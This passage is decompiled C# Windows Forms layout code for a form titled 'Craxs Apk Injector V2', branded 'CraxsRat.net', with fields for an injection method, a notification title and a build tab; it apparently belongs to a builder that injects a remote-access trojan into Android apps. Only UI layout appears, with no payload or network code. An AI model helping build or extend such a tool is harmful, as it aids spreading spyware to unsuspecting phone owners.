			this.Label10.Font = new global::System.Drawing.Font("Roboto Condensed", 14f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label10.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.Label10.Location = new global::System.Drawing.Point(367, 367);
			this.Label10.Name = "Label10";
			this.Label10.Size = new global::System.Drawing.Size(174, 29);
			this.Label10.TabIndex = 31;
			this.Label10.Text = "Notification Title";
			this.titletext.Cursor = global::System.Windows.Forms.Cursors.IBeam;
			this.titletext.FillColor = global::System.Drawing.Color.Black;
			this.titletext.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.titletext.ForeColor = global::System.Drawing.Color.White;
			this.titletext.Location = new global::System.Drawing.Point(323, 401);
			this.titletext.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.titletext.Maximum = 2147483647.0;
			this.titletext.Minimum = -2147483648.0;
			this.titletext.Name = "titletext";
			this.titletext.Padding = new global::System.Windows.Forms.Padding(5);
			this.titletext.Radius = 15;
			this.titletext.RectColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.titletext.RectDisableColor = global::System.Drawing.Color.FromArgb(227, 242, 253);
			this.titletext.Size = new global::System.Drawing.Size(248, 30);
			this.titletext.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.titletext.StyleCustomMode = true;
			this.titletext.TabIndex = 32;
			this.titletext.TextAlignment = global::System.Drawing.ContentAlignment.TopCenter;
			this.TabPage4.BackColor = global::System.Drawing.Color.Black;
			this.TabPage4.Controls.Add(this.log);
			this.TabPage4.Controls.Add(this.Button3);
			this.TabPage4.Location = new global::System.Drawing.Point(126, 0);
			this.TabPage4.Name = "TabPage4";
			this.TabPage4.Size = new global::System.Drawing.Size(691, 594);
			this.TabPage4.TabIndex = 3;
			this.TabPage4.Text = "Build";
			this.TabPage5.BackColor = global::System.Drawing.Color.Black;
			this.TabPage5.Controls.Add(this.Label6);
			this.TabPage5.Controls.Add(this.PictureBox2);
			this.TabPage5.Location = new global::System.Drawing.Point(126, 0);
			this.TabPage5.Name = "TabPage5";
			this.TabPage5.Size = new global::System.Drawing.Size(691, 594);
			this.TabPage5.TabIndex = 4;
			this.TabPage5.Text = "About";
			this.Label6.Dock = global::System.Windows.Forms.DockStyle.Bottom;
			this.Label6.Font = new global::System.Drawing.Font("Roboto Condensed", 14f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label6.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.Label6.Location = new global::System.Drawing.Point(0, 286);
			this.Label6.Name = "Label6";
			this.Label6.Size = new global::System.Drawing.Size(691, 308);
			this.Label6.TabIndex = 26;
			this.Label6.Text = "Developed By\r\n\r\nEVLF\r\n\r\nCopyright Recived CraxsRat.net\r\n";
			this.Label6.TextAlign = global::System.Drawing.ContentAlignment.MiddleCenter;
			this.PictureBox2.Dock = global::System.Windows.Forms.DockStyle.Top;
			this.PictureBox2.Image = (global::System.Drawing.Image)componentResourceManager.GetObject("PictureBox2.Image");
			this.PictureBox2.Location = new global::System.Drawing.Point(0, 0);
			this.PictureBox2.Name = "PictureBox2";
			this.PictureBox2.Size = new global::System.Drawing.Size(691, 179);
			this.PictureBox2.SizeMode = global::System.Windows.Forms.PictureBoxSizeMode.Zoom;
			this.PictureBox2.TabIndex = 24;
			this.PictureBox2.TabStop = false;
			this.DrakeUIAvatar4.AvatarSize = 25;
			this.DrakeUIAvatar4.BackColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIAvatar4.FillColor = global::System.Drawing.Color.Black;
			this.DrakeUIAvatar4.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.DrakeUIAvatar4.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.DrakeUIAvatar4.Location = new global::System.Drawing.Point(628, 36);
			this.DrakeUIAvatar4.Name = "DrakeUIAvatar4";
			this.DrakeUIAvatar4.Size = new global::System.Drawing.Size(39, 35);
			this.DrakeUIAvatar4.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.DrakeUIAvatar4.StyleCustomMode = true;
			this.DrakeUIAvatar4.Symbol = 61453;
			this.DrakeUIAvatar4.SymbolSize = 25;
			this.DrakeUIAvatar4.TabIndex = 0;
			this.DrakeUIAvatar4.Text = "DrakeUIAvatar4";
			this.DrakeUITitlePanel2.Controls.Add(this.DrakeUIAvatar4);
			this.DrakeUITitlePanel2.Dock = global::System.Windows.Forms.DockStyle.Bottom;
			this.DrakeUITitlePanel2.FillColor = global::System.Drawing.Color.Black;
			this.DrakeUITitlePanel2.Font = new global::System.Drawing.Font("Roboto", 9f);
			this.DrakeUITitlePanel2.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.DrakeUITitlePanel2.Location = new global::System.Drawing.Point(0, 629);
			this.DrakeUITitlePanel2.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.DrakeUITitlePanel2.Name = "DrakeUITitlePanel2";
			this.DrakeUITitlePanel2.Padding = new global::System.Windows.Forms.Padding(0, 35, 0, 0);
			this.DrakeUITitlePanel2.Radius = 15;
			this.DrakeUITitlePanel2.RectColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.DrakeUITitlePanel2.Size = new global::System.Drawing.Size(817, 34);
			this.DrakeUITitlePanel2.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.DrakeUITitlePanel2.StyleCustomMode = true;
			this.DrakeUITitlePanel2.TabIndex = 31;
			this.DrakeUITitlePanel2.Text = "CraxsRat.net";
			this.DrakeUITitlePanel2.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Right;
			this.DrakeUITitlePanel2.TitleColor = global::System.Drawing.Color.Black;
			this.Panel3.Controls.Add(this.Label13);
			this.Panel3.Dock = global::System.Windows.Forms.DockStyle.Top;
			this.Panel3.Location = new global::System.Drawing.Point(0, 0);
			this.Panel3.Name = "Panel3";
			this.Panel3.Size = new global::System.Drawing.Size(817, 35);
			this.Panel3.TabIndex = 24;
			this.Label13.Dock = global::System.Windows.Forms.DockStyle.Left;
			this.Label13.Font = new global::System.Drawing.Font("Roboto Condensed", 14f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label13.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.Label13.Location = new global::System.Drawing.Point(0, 0);
			this.Label13.Name = "Label13";
			this.Label13.Size = new global::System.Drawing.Size(264, 35);
			this.Label13.TabIndex = 19;
			this.Label13.Text = "Craxs Apk Injector V2";
			this.Label13.TextAlign = global::System.Drawing.ContentAlignment.MiddleLeft;
			this.Comboinject.BackColor = global::System.Drawing.Color.Black;
			this.Comboinject.DropDownStyle = global::System.Windows.Forms.ComboBoxStyle.DropDownList;
			this.Comboinject.FlatStyle = global::System.Windows.Forms.FlatStyle.Popup;
			this.Comboinject.ForeColor = global::System.Drawing.Color.White;
			this.Comboinject.FormattingEnabled = true;
			this.Comboinject.Items.AddRange(new object[]
			{
				"Method 1",
				"Method 2"
			});
			this.Comboinject.Location = new global::System.Drawing.Point(323, 217);
			this.Comboinject.Name = "Comboinject";
			this.Comboinject.Size = new global::System.Drawing.Size(163, 33);
			this.Comboinject.TabIndex = 24;
			this.Label9.AutoSize = true;
			this.Label9.Font = new global::System.Drawing.Font("Roboto", 13f);
			this.Label9.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.Label9.Location = new global::System.Drawing.Point(110, 223);
			this.Label9.Name = "Label9";
			this.Label9.Size = new global::System.Drawing.Size(186, 27);
			this.Label9.TabIndex = 25;
			this.Label9.Text = "Injection Method :";
			base.AutoScaleDimensions = new global::System.Drawing.SizeF(8f, 17f);
			base.AutoScaleMode = global::System.Windows.Forms.AutoScaleMode.Font;
			this.BackColor = global::System.Drawing.Color.Black;
			base.ClientSize = new global::System.Drawing.Size(817, 663);
			base.Controls.Add(this.maintapcontrols);
			base.Controls.Add(this.DrakeUITitlePanel2);
			base.Controls.Add(this.Panel3);
			this.DoubleBuffered = true;
			this.Font = new global::System.Drawing.Font("Roboto", 8.25f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
			base.FormBorderStyle = global::System.Windows.Forms.FormBorderStyle.FixedToolWindow;
			base.Name = "Jector";
			base.ShowIcon = false;
			this.Panel1.ResumeLayout(false);
			this.Panel1.PerformLayout();
			this.Panel2.ResumeLayout(false);
			this.Panel2.PerformLayout();
			((global::System.ComponentModel.ISupportInitialize)this.PictureBox1).EndInit();
			this.maintapcontrols.ResumeLayout(false);
			this.TabPage1.ResumeLayout(false);
			this.list_activ.ResumeLayout(false);
			this.list_activ.PerformLayout();
			this.TabPage3.ResumeLayout(false);
			this.TabPage3.PerformLayout();
			this.TabPage4.ResumeLayout(false);
			this.TabPage4.PerformLayout();
			this.TabPage5.ResumeLayout(false);
			((global::System.ComponentModel.ISupportInitialize)this.PictureBox2).EndInit();
			this.DrakeUITitlePanel2.ResumeLayout(false);
			this.Panel3.ResumeLayout(false);
			base.ResumeLayout(false);
		}

		// Token: 0x0400073B RID: 1851
		private global::System.ComponentModel.Container components;
	}
}
